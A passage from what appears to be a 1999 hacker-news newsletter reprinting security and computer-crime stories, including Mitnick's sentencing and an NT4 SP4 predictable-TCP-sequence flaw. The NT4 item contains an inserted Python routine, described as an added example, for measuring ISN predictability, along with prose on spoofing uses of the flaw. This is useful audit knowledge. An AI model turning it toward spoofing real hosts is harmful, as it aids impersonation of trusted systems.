Maidman's home was raided in June during a broad sweep by federal agents against computer criminals and phone "phreakers" -- people who hijack time and resources from phone companies. At the time, Coggins's office issued 16 warrants in 12 jurisdictions; the FBI said at the time that the investigation targeted the theft of passwords and credit cards, among other possible charges.

Coggins said the investigation is ongoing. But he said the government also has to set priorities, and that with limited resources, the hacking cases sometimes take a back seat to economic espionage or other major crimes that require high-tech forensics research.

The federal government is not alone in its frustration. State governments say they too are toiling under limited resources and expertise in dealing with computer-based evidence.
Kevin Higgins, chief Deputy Attorney General for the state of Nevada, said that the spread of computers among more ordinary criminals is making matters worse; even methamphetamine dealers carry electronic organizers with the names of their associates, he said.

"These days there's a debate over whether even to seize computers," he said. "You've pretty much got to have a room just to store them in."

Carl S. Kaplan is on vacation.

@HWA

33.0 Computer Hacker’s Sentence Spotlights High-Tech Crime Prosecutions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.epic.org/staff/banisar/hacker.html

Computer Hacker’s Sentence Spotlights High-Tech Crime Prosecutions

By David Banisar, Contributing Editor
Criminal Justice Weekly

Notorious computer hacker Kevin Mitnick, once described as "Cyberspace’s Most Wanted," is scheduled to be sentenced this month in U.S. District Court (C.D. Cal) to 46 months in prison after pleading guilty to computer fraud and abuse in April 1999 for breaking into dozens of computers around the United States. The sentencing will end a five-year, highly publicized chase and prosecution of the best-known hacker in the country. It raises many questions about the ability of law enforcement to handle cases involving new technologies and the prosecutions of those accused of computer crimes.

Cyberspace’s Most Wanted?

The case has been the subject of worldwide media attention, which Mitnick’s supporters say has blown his exploits out of proportion. The New York Times led the coverage, describing him in a 1994 front-page story as "Cyberspace’s Most Wanted." The Times stories increased interest in the case, and Mitnick was tracked down and arrested in North Carolina in 1995. He was charged with 25 counts of computer fraud, wire fraud, and wiretapping, but none of these alleged crimes were mentioned in the Times series.
In previous prosecutions, Mitnick’s relationship with computers has been described by mental health experts as "obsessive." In the current federal prosecution and a pending state case in California, he has not been accused of using computers for personal gain. Prosecutors apparently decided to use his case as a warning to others.

Since his arrest, he has been held without bail and repeated requests for a bail reduction hearing have been denied. Prosecutors refused to give him access to a computer with the eight gigabytes of evidence they planned to use against him, claiming that he could use it to break into more systems, even without a phone line and modem. He was once put into solitary confinement when prosecutors claimed that he was converting an AM/FM radio into a transmitter.

Mitnick pleaded guilty to five felony charges following over four years of pretrial detention. He is now eligible for release to a halfway house, having already served most of his time. The probation office has recommended that unsupervised use of computers, modems, or cellular phones be prohibited as a condition of supervised release.

Mitnick still faces a California state charge of computer fraud for telephoning the California DMV in 1992 to persuade an employee there to fax him the driver’s license information of a suspected informant. According to Carolyn Hagin, an attorney at the law offices of famed hippie lawyer Tony Serra, the attorney who is representing Mitnick in state court, an attempt to lower bail from $1 million was denied by a Los Angeles Superior Court judge on July 9, who admitted that media portrayals of Mitnick convinced him to deny bail.

Meanwhile, John Markoff, the New York Times reporter whose gripping front-page stories made Mitnick a celebrity, landed a book contract one week after Mitnick’s capture worth a reported $750,000. Takedown, a movie starring Tom Berringer, is scheduled to be released later this year.
The Long Arm of the Law

The primary federal statute regarding computer crime is the Computer Fraud and Abuse Act (18 USC § 1030). The Act, originally adopted in 1984 and substantially amended in 1986 and 1990, prohibits the unauthorized access or exceeding of the user’s permitted access to computers run by government agencies, financial institutions, or computers used in interstate or foreign commerce, such as those connected to the Internet. It also prohibits releasing viruses or other programs that can secretly access computers and cause damage.

The penalties for a first offense range from one year for accessing computers without intending to cause damage and without financial gain, to five years for intentionally damaging computers or stealing information for material gain. A maximum of ten years can be imposed for using the access to obtain information protected "for reasons of national defense or foreign relations."

There are several other statutes included in the U.S. Department of Justice Computer Crime Program category: those involving trafficking in access devices such as passwords, cell phone cloning devices, or credit card numbers (18 U.S.C. § 1029), and mail and wire fraud (18 U.S.C. § 1343). Every state also has its own computer statute.

Referrals Increasing, Most Cases Rejected

Federal agency referrals for prosecution of computer crimes have increased substantially over the past several years, but actual prosecutions are fairly rare. According to U.S. Justice Department data obtained under the Freedom of Information Act by the Transactional Records Access Clearinghouse (TRAC) of Syracuse University, the DOJ prosecuted 83 cases out of 417 referred in 1998 under the Computer Fraud program category. Referrals have more than tripled since 1992 and 1993. Each year between 1992 and 1998, the DOJ has declined to prosecute between 64 and 78 percent of these cases.
Forty percent of the cases were declined because of lack of evidence of criminal intent, weak or insufficient admissible evidence, or no apparent violation of federal law.

In 1998, 47 persons were convicted of computer crimes and 10 were found not guilty. Twenty were sentenced to prison. That year, the average sentence for those convicted was five months, and over half received no jail time. Since 1992, 196 persons have been convicted and 84 persons have been sentenced to prison for computer crimes. Average sentences imposed for federal computer fraud and abuse violations have ranged from four to 18 months. In most years, over half of those convicted served actual time behind bars.

The longest sentence was against profit-oriented hacker Kevin Poulsen, who was sentenced in 1995 to 71 months for manipulating the phone system to win radio contests. Like Mitnick, he was held without bail for five years. In his case, the prosecution initially charged him with obtaining classified information as a justification for denying bail and then dropped the charge before trial.

Currently, there is no federal sentencing guideline specifically applicable to the Computer Fraud and Abuse Act (18 U.S.C. §§ 1029-1030). In 1993, the U.S. Sentencing Commission’s Computer Fraud Working Group examined the application of existing federal sentencing guidelines as applied to the statute. The working group found that for most cases, the fraud guideline, Section 2F1.1, adequately addressed most offenses. It recommended against creating a new guideline for computer fraud because of the difficulty in measuring harm, the possibility of charging decisions that could lead to the same actions being prosecuted differently, and the lack of empirical support (case law) for creating a separate guideline. The working group is presently drafting guidelines on losses for software piracy as required by Congress under the No Electronic Theft (NET) Act (PL 105-147, 1997).
The FBI claims that there were nearly $400 million in losses between 1996 and 1998 due to computer fraud, but these numbers are difficult to verify. Mark Rasch, a former federal prosecutor and now senior vice-president of Global Integrity Corp., a Virginia computer security consulting firm, notes that the issue of damages in these types of cases "drives the sentencing guidelines" and are "tremendously fact specific."

In many cases, the numbers appear to be grossly inflated. In 1990, the federal government brought a case against Craig Neidorf, the publisher of Phrack magazine, an underground online newsletter, for publishing the "source code" to BellSouth’s emergency 911 system. Prosecutors claimed that with the code, which they valued at $57,000, hackers could shutdown the 911 system in the United States. Three days into the trial, Neidorf’s attorneys showed that the document was actually a memo on procedures available for sale from BellSouth’s own catalog for $13, and the case was dropped. BellSouth had included in its figures the cost of the workstation used to write the memo and the salary of the author.

In Mitnick’s case, the companies whose computers he broke into, including Sun Microsystems and Nokia, claim that he caused nearly $300 million in damages by accessing their systems and stealing software. Several of the companies listed the entire cost for developing the software, rather than actual losses. Recently, Sun Microsystems, which claimed Mitnick stole source code worth $80 million, began selling the same code to students and software developers for $100. Phil Karn, a senior engineer at Qualcomm Inc., a San Diego-based cellular phone manufacturer, whose offices were broken into by Mitnick, told the Los Angeles Times that "the real damage was loss of productivity and hassles . . . I don’t want to condone what Mitnick did, but he’s really not public enemy No. 1."

Assistant U.S. Attorney David Schindler is demanding Mitnick pay $1.5 million in restitution. His sentencing hearing has been put off several times while this issue is being negotiated, but supporters say that without access to computers, Mitnick is unlikely to ever be able to earn enough money to pay restitution, no matter what the amount.

A Cyberspace War or a New Red Scare?

While Mitnick cooled his heels awaiting trial, a new public fear of computers, and the potential impact of computer hackers on individual lives and national security has emerged. In 1998, President Clinton signed Executive Order PDD 63, Critical Infrastructure Protection. Following the Executive Order, a number of government agencies including the FBI, DOJ, and the National Security Agency (NSA), pressed for limits on security programs that include encryption, which can protect communications from interception, and new powers to access telecommunications providers, such as telephone companies to protect them from cyberattacks.

The New York Times reported on July 28 that the National Security Council has proposed a Federal Intrusion Detection Network (Fidnet) that would monitor traffic on the Internet to look for patterns of computer intrusions. Data on the traffic would be stored at the National Infrastructure Protection Center, an interagency task force run by the FBI.

Thomas Guidoboni of Michaels, Wishmer and Bonner, Washington, D.C., who has represented several persons accused of computer crimes, says there is a paranoia about hackers. "Everyone is frightened of what they can do. . . . It scares people to think their computers can be broken into."

The NSC proposal, which could have profound privacy and civil liberties implications, has been criticized both inside and outside the government and is unlikely to be adopted. But the combination of the growth of the Internet, fear, and bureaucratic demands for more power to protect systems ensure that there will be more prosecutions in the coming years.
David Banisar is a Washington, DC, area attorney specializing in computer and communications law. He is the co-author of The Electronic Privacy Papers (John Wiley and Sons, 1997) and a Senior Fellow at the Electronic Privacy Information Center. He is a contributing editor to Criminal Justice Weekly.

Editor’s note: Since the publication of this article, Mitnick was sentenced to 46 months in jail and ordered to pay $4,100 in restitution. The pending case against him in the state of California was also dropped.

@HWA

34.0 Triads Linked to Info Vandalism - Alleged CoverUp by RCMP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Hex_Edit

Classified documents from the Royal Canadian Mounted Police allege that Chinese nationals with links to the Triads (Chinese Mafia) have broken into the computer system at the Canadian High Commission in Hong Kong. The Computer Assisted Immigration Processing System is supposed to have had over 788 files deleted. The intrusions may have taken place as long as seven years ago. It is believed that the RCMP is covering up the events.

National Post
http://www.nationalpost.com/home.asp?f=990826/63514

Vancouver Province
http://www.vancouverprovince.com/newsite/news/990826/2775271.html

National Post;

Triads linked to hacking at Canadian mission
Files deleted, blank visa forms missing in Hong Kong

Fabian Dawson
The Province

VANCOUVER - Chinese nationals linked to organized crime have broken into the immigration computer at the Canadian High Commission in Hong Kong, classified documents allege.

At least 788 files from the Computer Assisted Immigration Processing System (CAIPS) were deleted, and up to 2,000 blank visa forms have disappeared, according to the documents.

The core allegation is that certain people paid locally engaged high commission staff to delete their backgrounds in the computer system to hide their links with Triads -- the Chinese Mafia.
A related concern is that the stolen visa forms have been used by possibly hundreds of people, including criminals, to enter Canada illegally.

For seven years, the RCMP, Immigration Canada and the Department of External Affairs are alleged to have kept a lid on the case, which several sources call a ''breach of national security.''

Two key figures in the investigation suspect the RCMP is covering up criminal acts and negligence at Canada's immigration office in Hong Kong.

Details of the case are contained in reports filed by Robert Read, an RCMP corporal in Ottawa, and Brian McAdam, a former immigration control officer at the high commission in Hong Kong.

''I believe there has been a massive conspiracy to cover up the whole issue,'' Cpl. Read said. In a report marked ''Top Secret,'' he wrote: ''The loss of control of CAIPS ... loss of control over immigration from Hong Kong ... from 1986 to 1992 is a most serious breach of national security."

Cpl. Read, who has written orders from his boss, Inspector Jean Dube, not to talk to the media, said: ''I am going public because there needs to be a public inquiry into this whole thing.''

Officials would not confirm or deny the existence of an investigation. In fact, the investigation began in 1992, when the Department of External Affairs sent to Hong Kong an electronic data processing officer, David Balser, and RCMP Sergeant John Conohan.

According to Cpl. Read and Mr. McAdam, the two carried out a cursory investigation. Neither Mr. Balser nor Mr. Conohan recommended further investigations or criminal charges, despite Mr. McAdam's reports, which indicated security breaches by locally employed staff and the discovery of fake Canada Immigration stamps in one of their desks.

Mr. Conohan was also told about local staff who had given themselves unauthorized, top-level security clearance to access the computer, according to one of Cpl. Read's reports.

Mr. Conohan reported that the suspect in whose desk the fake stamps were found had fled to Taiwan, despite being given information that she was living in B.C., some of the reports allege.

Documents also show that a second suspect, who operated the CAIPS computer, fled her job in September, 1993, because of gambling debts owed to Triads.

Mr. Balser's report is described by investigators familiar with the allegations as ''unintelligible bureaucratese.'' He makes no express mention of the deleted files, fake stamps or missing blank visas, which were included in Mr. McAdam's reports.

Mr. Balser does talk about the potential for security breaches and recommends that locally engaged staff not be given high security clearance. He hints that someone could misuse blank visas, which were left lying in open cardboard boxes, but does not report allegations that at least 2,000 blank immigrant visas were found to be missing.

Mr. Read alleges that Mr. Balser has told him on the record that he was ordered to ''obfuscate'' his report. Mr. Balser is now retired and could not be reached for comment.

Unable to get any answers to his concerns, Mr. McAdam continued with his complaints and a series of RCMP investigators were given the case and then abruptly transferred.

The Canadian Security Intelligence Service, was also brought in to investigate Chinese espionage and together with the RCMP launched Operation Sidewinder in 1995. That operation, which was to look at the influence of Chinese officials and tycoons at the Hong Kong mission, was also halted.

The investigation into the penetration of CAIPS is now being conducted by Sergeant Sergio Pasin of the immigration and passport section of the RCMP.

''If the RCMP does not tell the government that a disaster has occurred, the government cannot decide how to react to it, cannot decide when to tell the people of Canada what has occurred,'' said Cpl.
-=-

Vancouver Province;

'A breach of national security'
Files at Canada's diplomatic mission in Hong Kong were infiltrated

Fabian Dawson, Staff Reporter
The Province

Chinese nationals linked to organized crime have broken into the immigration computer at Canada's diplomatic mission in Hong Kong, classified documents obtained by The Province allege.

At least 788 files from the Computer-Assisted Immigration Processing System (CAIPS) were deleted, and up to 2,000 blank visa forms have disappeared, according to the documents.

The core allegations are:

- That certain people paid locally engaged staff of the Canadian commission (now the consulate-general) to delete their backgrounds in the computer system to hide their links with triads -- the Chinese Mafia.

- That the visa forms have been used by possibly hundreds of people, including criminals, to enter Canada illegally.

For seven years, the RCMP, Immigration Canada and the department of external affairs are alleged to have kept a lid on the case, unwilling to reveal the extent of what several sources call a "breach of national security."

Two key figures in the investigation suspect the RCMP is covering up criminal acts and negligence at Canada's immigration office in Hong Kong.

Details of the case are contained in reports filed by Robert Read, an RCMP corporal in Ottawa, and Brian McAdam, a former immigration control officer at the Canadian commission in Hong Kong.

"I believe there has been a massive conspiracy to cover up the whole issue," Read said.

In a report marked Top Secret, he wrote: "The loss of control of CAIPS . . . loss of control over immigration from Hong Kong . . . from 1986 to 1992 is a most serious breach of national security."

Read, who has written orders from his boss, Insp. Jean Dube, not to talk to the media, told The Province: "I am going public because there needs to be a public inquiry into this whole thing."

Official spokesmen would not confirm or deny the existence of an investigation.
In fact, the investigation began in 1992, when the department of external affairs sent to Hong Kong an electronic data processing officer, David Balser, and RCMP Sgt. John Conohan.

Read and McAdam say the two men carried out a cursory investigation. Despite evidence indicating security breaches by locally employed staff and the discovery of fake Immigration Canada stamps in one of their desks, neither recommended further investigations.

Conohan was also told about local staff who had given themselves unauthorized, top-level security clearance to access the computer, according to one of Read's reports.

The sergeant reported that the suspect in whose desk the fake stamps were found had fled to Taiwan, despite having been given information that she was living in B.C., some of the reports allege.

Documents also show that a second suspect, a woman who operated the CAIPS computer, fled her job in September 1993 because of gambling debts owed to triads.

Balser's report, a copy of which The Province has obtained, is described by sources familiar with the allegations as "unintelligible bureaucratese." He makes no express mention of the deleted files, fake stamps, missing blank visas or the disappearing local staff.

Balser does talk about the potential for security breaches and recommends that locally engaged staff not be given high security clearance. And he hints that someone could misuse blank visas, which were left lying in open cardboard boxes, but does not report allegations that at least 2,000 blank immigrant visas were found to be missing.

Read, a Mountie for 24 years, alleged that Balser has told him on the record that he (Balser) was ordered to "obfuscate" his report. Balser is now retired.

Unable to get any answers to his concerns, McAdam continued with his complaints. A series of RCMP investigators were given the case and then abruptly transferred.
The Canadian Security and Intelligence Service, Canada's spy agency, was brought in to investigate Chinese espionage. Together with the RCMP, CSIS launched Operation Sidewinder in 1995. That operation, which was to look at the influence of Chinese officials and tycoons at the Hong Kong mission, was also abruptly halted.

The investigation into the penetration of CAIPS is now being conducted by Sgt. Sergio Pasin of the immigration and passport section of the RCMP in Ottawa.

"There is enough evidence in this case and in my other reports to initiate a public inquiry . . . but for some reason nobody wants to do anything," said McAdam.

"If the RCMP does not tell the government that a disaster has occurred," said Read, "the government cannot decide how to react to it, cannot decide when to tell the people of Canada what has occurred.

"They have Balser's report, McAdam's testimony, the missing files in Hong Kong . . . and my report.

"Why won't they do anything?"

@HWA

35.0 DoD Preps to Fight InfoCriminals Both Foreign and Domestic
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by mmuliin3
The Joint Task Force on Computer Network Defense came to full strength in June and is now ready to monitor the nation's defense networks for cyber attack regardless of where that attack may originate from. The JTF-CND works out of the Global Network Operations and Security Center at Defense Information Systems Agency headquarters in Arlington, Va. and is under the control of Space Command.

(Interesting quote in this article: "We don't get real worried about Web page hacks," said Army Col. Larry Frank, chief of operations. "That's an appearance issue." - Somehow I don't think he gets it.)
Government Computer News
http://www.gcn.com/vol18_no27/news/440-1.html

August 23, 1999

DOD set to fight hackers both foreign and domestic

Task force monitors network to give department another layer of protection against cyberterrorism

By William Jackson
GCN Staff

When the Defense Department’s Joint Task Force on Computer Network Defense opened for business last December, it found plenty to do.

“We have been at cyberwar for the last half-year,” deputy Defense secretary John Hamre said. “At least we had a place to work on it.”

Hamre spoke at ceremonies this month to mark the task force’s coming to full strength in June. Since then, an interservice staff—supported by the DOD Computer Emergency Response Team, an intelligence cell and law enforcement liaisons—has been monitoring the Defense Information Infrastructure around the clock.

The task force works out of the Global Network Operations and Security Center at Defense Information Systems Agency headquarters in Arlington, Va.

So far, none of the cyberthreats has proved serious. But Hamre said DOD’s primary mission is to prepare for the next battle, “buying the infrastructure in advance that we know we are going to need at some time.”

Hamre has testified to Congress about the threat of what he called an electronic Pearl Harbor—an attack on the nation’s information infrastructure. He said he was referring not to a devastating surprise attack but rather to military preparedness.

“It wasn’t that we got hit, but that we were ready to respond,” Hamre said.

Warning signs

Until recently, DOD has not been ready to respond to a full-scale electronic attack. Air Force Maj. Gen. John Campbell, DISA vice director and task force commander, said the network defense unit grew out of the Eligible Receiver 97 exercise in 1997, in which National Security Agency teams waltzed into DOD systems using off-the-Internet hacking tools.

No one was then in charge of defending DOD networks, and it showed, Campbell said. Awareness was reinforced by the monthlong Solar Sunrise assault on DOD systems by a pair of teen-agers last year.

Today, “we are really serious about protecting our networks and our systems,” Campbell said.

Although the task force is physically at DISA headquarters, organizationally it is part of the Space Command, reporting to the commander-in-chief at Peterson Air Force Base, Colo.

The task force uses DISA’s global network management capability to monitor and analyze problems on DOD systems and coordinate responses.

“We don’t fix the computers; we look at the operational side,” said Army Col. Larry Frank, chief of operations. “The other thing we bring to the table is command authority.” DISA has no authority over any of the services.

The task force this spring encountered the Melissa computer virus, which spread rapidly by e-mail and threatened to swamp some DOD systems. The virus struck on a Friday, giving a two-day weekend buffer. The Defense CERT responded with a patch to block the virus within 12 hours.

“We were lucky it wasn’t very damaging,” Frank said.

The task force was aware of hacks against DOD Web sites during the air war in Kosovo, but they were not operationally significant, Frank said, because DOD does not rely on the Web to carry out its missions.

“We don’t get real worried about Web page hacks,” he said. “That’s an appearance issue.”

The task force has a judge advocate on staff and liaison officers from DOD criminal investigative agencies. It also maintains a working relationship with the FBI and other law enforcement agencies.

Most attacks come from the outside, Frank said, and dealing with them is a law enforcement issue. An attack from beyond U.S. borders might become an intelligence issue. National jurisdictions are blurred in cyberspace, Frank said.
@HWA

36.0 Another Big Hole Found in NT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by newbie
NTA Monitor Ltd has discovered that Windows NT with SP4 is vulnerable to Predictable IP Sequence Numbering, also known as IP Spoofing. IP Spoofing is a technique used to make it appear that a user has a different IP address than he is supposed to have.

NTA Monitor
http://www.nta-monitor.com/news/NT4-SP4.htm

Microsoft
http://support.microsoft.com/support/kb/articles/Q192/2/92.ASP

NTA Monitor

Leading Security testers ’NTA Monitor’ Discover Security Flaw in Microsoft NT4 SP4

25 August 1999

NTA Monitor Ltd have discovered a flaw (known as ‘Predictable TCP Sequence Numbering’) in Microsoft NT 4 when used with Service Pack 4 (SP4), which means that it is vulnerable to a range of attacks known as ‘IP spoofing’. Microsoft’s web site has referred to SP4 correcting a similar problem with NT4 SP3, but it is now apparent that although there has indeed been a change to the sequence numbering method used, the new method is no more secure than SP3.

NTA Monitor Ltd came across the issue in the course of an external test (also known as a Penetration Test) of the security of an Internet gateway for one of its over 100 corporate customers, performing the Regular Monitor test service. NTA Monitor reported to the customer the fact that one of their public servers appeared from other tests to be NT based, but had a different predictable IP sequence problem. Following confirmation from the customer that NT4 SP4 was in use, NTA then performed bench testing to confirm that the problem is generic to the product.

Further discussions with Microsoft took place over several weeks, and Microsoft have now confirmed NTA Monitor’s findings. Microsoft will be addressing this issue and making it public so that systems administrators with NT4 SP4 in use can review what action they should take in light of this new risk.
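The press release does not say how the predictability was measured. The following audit routine is an added example (not NTA Monitor's or Microsoft's code) of the kind of bench test a sysadmin can run on their own hosts before exposing them: sample a handful of initial sequence numbers (ISNs) from a server's SYN/ACKs, look at the increments between successive samples, and report how narrow the range of increments is. A constant or narrowly varying increment means the next ISN can be guessed from the previous one, which is the property spoofing attacks rely on. The ISN samples below are constructed inline; a real run would collect them from repeated connections to the host under test.

```python
"""Classify sampled TCP initial sequence numbers as predictable or not.

Added example, not code from NTA Monitor or Microsoft. The samples are
constructed here; in practice they would come from the SYN/ACK of several
connections opened to the host being audited (nmap's ISN test works on the
same principle).
"""
from itertools import accumulate

ISN_SPACE = 2 ** 32          # ISNs are 32-bit and wrap around

# Constructed sample 1: increment is exactly 64000 every time.
FIXED_STEP = [0x1000 + 64000 * i for i in range(8)]

# Constructed sample 2: increment hovers around 64000 with a little jitter.
JITTERED = list(accumulate([0x2000, 64000, 64010, 63990, 64004, 63995, 64001]))

# Constructed sample 3: no visible relationship between successive values.
RANDOM_LIKE = [0x9A3F1C2B, 0x12345678, 0xDEADBEEF, 0x0BADF00D,
               0x7F00C0DE, 0x3C3C3C3C, 0xFEEDFACE, 0x00001234]


def isn_increments(isns):
    """Differences between successive ISNs, taken modulo the 32-bit space."""
    return [(b - a) % ISN_SPACE for a, b in zip(isns, isns[1:])]


def isn_guess_window(isns):
    """Spread of the increments: how many candidate values a guesser of the
    next ISN would have to cover, given the previous one. 0 means one guess."""
    diffs = isn_increments(isns)
    return max(diffs) - min(diffs)


def classify_isn(isns, window_threshold=65536):
    """Verdict for an audit report.

    window_threshold is an assumed cut-off: if the increments vary by less
    than this, the next ISN is guessable with a modest number of tries.
    """
    if len(isns) < 4:
        raise ValueError("need at least 4 ISN samples")
    window = isn_guess_window(isns)
    if window == 0:
        return "predictable: fixed increment"
    if window < window_threshold:
        return "predictable: narrow increment range"
    return "unpredictable"


if __name__ == "__main__":
    for name, sample in (("fixed", FIXED_STEP), ("jittered", JITTERED),
                         ("random-like", RANDOM_LIKE)):
        print("%-12s window=%-12d %s" % (name, isn_guess_window(sample),
                                         classify_isn(sample)))
```

The window figure is the useful number for the risk decision the release asks administrators to make: a host whose increments fall in a range of a few thousand values is exposed to blind spoofing in a way a host with a wide, random-looking range is not, and the measurement can be repeated after a patch or platform change to confirm the fix took.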
Each user needs to weigh up the risks from this flaw in their own particular network environment, and the impact from a potential security breach. Individual decisions will need to be made as to whether to temporarily disable NT4 SP4 servers from Internet usage, or move to alternative non-NT platforms, or to continue as is, with heightened observation of the servers.

NT4 is widely used on the Internet by organisations for public-facing servers such as Email hosts (using for example Microsoft Exchange) or Web servers (Microsoft’s Internet Information Server (IIS) has a large number of users). This flaw allows an attacker to communicate with the victim device whilst appearing to be another system, such as a trusted host or another system inside the organisation’s network, and thus to circumvent the device’s protections against external Internet systems.

The simplest exploit possible would be sending ‘perfectly untraceable’ fake email - which will be received by staff at the victim site and be indistinguishable from a genuine email from the faked email ‘From:’ address. More serious exploits would include obtaining a remote log-in to systems as if from the organisation’s inside networks, and once achieved with further scope to attempt to take full control of the victim system.

NTA Monitor will be posting news of this problem on a number of the Internet security mail lists and newsgroups.

Says NTA Monitor’s Testing Development Director Roy Hills: "Although here at NTA Monitor we do a huge amount of security testing of corporate Internet security, we are not a security research company - and so we were initially surprised to find such a flaw. It appears that no one else has spotted this before, and begs the question as to whether Microsoft themselves did any testing after releasing SP4 for NT4...
"However, it simply highlights a message that we make every day - that active security testing is the only way to find out whether an organisation’s Internet perimeter is really providing the intended security - and this testing should be regular - monthly or quarterly.

"Every VP or Director of IT should ask to see their organisation's last Internet security test report.

"In fact many organisations have never had their security tested, and those that have tend to rely on an annual test - which is quite ineffective when you consider the fact that there are typically 5 or 6 significant new Internet security risks every month, providing remote exploitation attacks on widely used Internet software products."

@HWA

37.0 Korea to Block All Porn
~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Lamer
The Commission on Youth Protection in South Korea yesterday said it will ask the 26 local Internet service providers (ISPs) to ban access to all pornography. ISPs defying the government ban will be punished with up to two years in prison or 20 million won in fines, plus the cancellation of their business licenses.

The Korea Herald
http://www.koreaherald.co.kr/news/1999/08/__02/19990826_0211.htm

Gov't to block online porn from abroad

The government has decided to ban pornographic material from being provided by foreign servers over the Internet.

The Commission on Youth Protection, which folds under the Prime Minister's Office, said yesterday it will seek to have about 26 local Internet service providers (ISPs), such as KORNET, BORANet and NETSGO, block pornographic sites provided through foreign servers.

Existing laws ban pornographic material by domestic servers. But between 50 and 100 sites carried by foreign servers have been virtually unrestrained, and officials noted that domestic pornographic program providers have used the foreign servers, exploiting the loophole that limits domestic laws from being able to govern foreign-based servers.
The special measure involves two steps that aim to make lewd material inaccessible to all Internet users in Korea.

"The idea is to make hard-core, violent and perverted pornography illegal for all users, just as we do with printed material," Nam Hyung-ki, a commission member, said.

To that end, the commission said that it will first ask the minister of information and communications to decree an administrative order to the nation's ISPs to block foreign pornographic sites early next year.

At the same time, the commission will require ISPs to develop technical devices and measures, such as real-name user-ID systems, to sort out the minors among its users.

Both commission officials and industry insiders said that such a measure will take some time to take root, suggesting that an all-out ban on Internet pornography is a more likely scenario in the near future.

ISPs defying the government ban will be punished with up to two years in prison or 20 million won in fines, plus the cancellation of their business licenses.

Meanwhile, industry insiders welcomed the announcement, but doubted that the measures would be effective.

"It is technically possible, I guess, to block pornographic sites to minors. But there will always be some loophole, some minor who will use his or her parents' name to click on," an employee at one of the nation's 20 ISPs said.

Updated: 08/26/1999
by Kim Ji-soo
Staff reporter

@HWA

38.0 Grammatically Challenged InfoCriminal Defaces Site
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
The Tucson Unified School District's web site was defaced by what reporters have called a 'grammatically challenged' individual. The defacement left obscenities, misspellings, and grammar errors throughout the page. Local officials are investigating.
Arizona Daily Star
http://www.azstarnet.com/public/dnews/121-8392.html

@HWA

39.0 Bank Emails Virus to Investors
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Yazmon
Last Friday Fuji Bank Ltd in Japan accidentally emailed a computer virus to a few global investors. A spokesperson for Fuji said that the email came from a machine that is not normally used and therefore was outside what they normally monitor. The virus, on the 14th day of each month, would display the message "big stupid jerk".

Financial Times
http://www.ft.com/hippocampus/q14554e.htm

Fuji Bank bugs investors with rude e-mail

By Gillian Tett and Alexandra Nusbaum in Tokyo

One of Japan's biggest banks has embarrassed itself - and risked insulting some of its key investors - by e-mailing a computer virus to dozens of fund managers worldwide.

The e-mailed memo was part of a public relations offensive by Fuji Bank, which last week announced plans for a merger with Industrial Bank of Japan and Dai-Ichi Kangyo Bank to create the world's largest banking group.

The bug will make recipients' computers display a message from Fuji Bank on the 14th day of each month telling the viewer in English that he or she is "a big stupid jerk!". It also changes some of the names in the e-mail to "Dr Mountain Dew".

Fuji yesterday admitted it had inadvertently sent out a virus to dozens of global investors in a memo describing the three-way alliance. When it discovered what had happened, it sent a second e-mail warning recipients about the bug and the insulting message.

"I have never received anything like this from a Japanese bank before," said Brian Waterhouse, analyst at HSBC Securities. "I have also never heard of a case of a Japanese bank having a computer bug problem before. But I suppose that's a sign of technological change, and them catching up with the rest of the banking world."

A Fuji official said yesterday: "This computer bug is absolutely no joke . . .
we have never seen anything like this before. We are determined that this will never happen again."

The bank said it had eliminated the virus from its own software. It denied suggestions that the bug might have been the work of employees opposed to restructuring, saying it had come from "outside sources".

Fuji had produced the merger announcement in such a hurry that it had taken the unusual step of outsourcing some of its information technology procedures rather than relying on its own staff.

@HWA

40.0 IS YAHOO SPAM OR ANTI-SPAM ORIENTED?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by BHZ, Friday 27th August 1999 on 10:12 pm CET

Is Yahoo for spam or against it? According to Wired reporter Chris Oakes, they play on both sides of the coin. "Yahoo distributes the advice to users of its Yahoo Store electronic storefront hosting service. The Web site instructs users on how to send out unsolicited email to target promotional partners for their Yahoo-hosted storefronts." Read the very interesting article on it below.

http://www.wired.com/news/news/technology/story/21461.html

Yahoo Two-Faced on Spam

by Chris Oakes

3:00 a.m. 27.Aug.99.PDT

Can the Web's most popular site be anti-spam and pro-spam all at the same time? Anti-spammers say the contradiction is alive and well at Yahoo.

See also: Yahoo: Keep Your Homestead

"Anytime you're saying 'look for a list of people and send them an unsolicited message,' that's spam," said Peter Seebach, president of tiny ISP Plethora.net in St. Paul, Minnesota.

Yahoo distributes the advice to users of its Yahoo Store electronic storefront hosting service. The Web site instructs users on how to send out unsolicited email to target promotional partners for their Yahoo-hosted storefronts.

Seebach said he encountered the advisory pages on Yahoo after being led to the Yahoo pages by way of an anti-spam mailing list.
"Step one is to build a list of sites that you want to get links from," reads the page, which is entitled "Build Traffic with Incentives." It reads:

...For example, if you are selling products related to show dogs, search for show dog in all the search engines. Add those sites to your list, then follow the links to find others.

The instructions then recommend emailing the webmasters to try to get them to link. But using Yahoo's email service to spam these folks is a no-no, the instructions warn:

"Note: Don't use your Yahoo! Mail account to do this, because all unsolicited commercial email is forbidden by the Yahoo! Mail terms of service."

"Although this type of mail isn't really spam in the usual sense of the word, it is unsolicited, and your account could be canceled for it if someone complains."

Is there a contradiction here?

"We're not advocating a form message or mass distribution," said Tim Brady, executive producer of Yahoo. "What we're advocating is to use search engines to find related sites, write those sites down, and contact them. Probably somewhere in there, there's a judgment call."

Seebach said these stances are all the more alarming because they contradict the company's overall opposition to spam. "In a lot other contexts, Yahoo has been fairly solidly anti-spam. So it's sort of surprising."

But Brady said there is no disparity in its policies. "Yahoo Store's terms of service forbid spam, and we have shut down sites for spam. There have only been a couple of cases."

"I think our policies are consistent."

